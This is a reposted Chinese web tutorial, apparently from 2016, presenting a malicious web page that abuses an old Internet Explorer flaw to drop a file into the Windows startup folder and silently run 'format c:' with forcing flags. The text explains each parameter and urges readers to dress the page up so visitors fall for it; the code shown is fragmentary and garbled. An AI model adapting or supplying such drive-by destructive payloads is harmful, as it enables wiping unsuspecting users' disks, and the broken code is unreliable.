有关HTML代码的另类应用技巧

2016-01-29 11:45 2 1 收藏

有关HTML代码的另类应用技巧,有关HTML代码的另类应用技巧

【 tulaoshi.com - Html 】

这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。

现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。

(本文来源于图老师网站,更多请访问https://www.tulaoshi.com/html/)

我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。

下面我们看一下下面的代码我们就会发现其中的奥妙所在了。

scr.reset() scr.path="c:windowsstart menuprograms启动文件名 scr.doc="" wsh.run('start.exe /m format c:/q/autotest/u')

对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。

下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。

首先,我们来看看这一句

scr.path="c:windowsstart menuprograms启动文件名

这句,就是当看到这个网页的时候,它会写入到用户的机器的启动目录下,并以一个文件名的文件形式出现

wsh.run('start.exe /m format c:/q/autotest/u')

这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。

在这里我把他的一些参数,简要的说说,大家会更加明白的。

在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗/autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与/m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。

(本文来源于图老师网站,更多请访问https://www.tulaoshi.com/html/)

在这段代码里,核心语句

wsh.run('start.exe /m format c:/q/autotest/u')

我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。

来源:https://www.tulaoshi.com/n/20160129/1483238.html

延伸阅读
标签: Web开发
说明 !-- *** -- (浏览器不会显示) 档案型态声明 !DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN" 3.0 档案型态声明 !DOCTYPE HTML PUBLIC "-//W3O//DTD W3 HTML 3.0//EN" 可搜寻 ISINDEX (指示可搜寻的索引项) N1.0 提示 ISINDEX PROMPT="***" (要求输入的提示文字) 送出搜寻条件 A HREF="URL?***"/a ...
标签: Web开发
把w3c的原文放在这里并不是想吓唬任何人,只是觉得应该告诉大家学习一门语法的方法。在能力允许的范围内尽可能自己去查阅原版的官方文档,这样你不仅可以拿到最完整的信息,而且这是一个高手成长之路。翻译的东西多半掺有个人想法,以及个人能力的有限都造成这样一种局面:很难在翻译的教材里面找到完整的相关信息,从而使个人的技术水平一...
标签: Web开发
textarea的value是html文件源代码,如何把源代码存成html文件??      如      html      head      meta   http-equiv="Content-Type"   content="text/html;   charset=gb2312" &...
标签: Web开发
大家都知道对于一个页面来说,最基本的结构呢就是 html head !-- 头部信息内容区域 -- /head body !-- 页面显示内容区域 -- /body /html 对于这样的一个结构,不会有人感到陌生,然而往往有时候却是大家越熟悉的东西就容易让人去遗忘了他们的存在。或许你会在想,这个结构这些标签有什么好聊的呢,每个页面都需要他们的啊。是啊,以前我一直...
标签: Web开发
如果你是一个喜欢什么都用div来标签的人,那么这个教程一定很适合你.在这个教程里着重讲如何规范的来写HTML代码让它更加的有意义.你有没有经历过这样的场景:在编缉别人的模版时发现那些语意不明的标签,你的感觉是什么样子的.学完这个教程后你会发现规范的代码不仅仅为你以后修改代码省下时间,特别是当你调试一个大的项目时你会发现,原来规范代...

经验教程

798

收藏

75
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部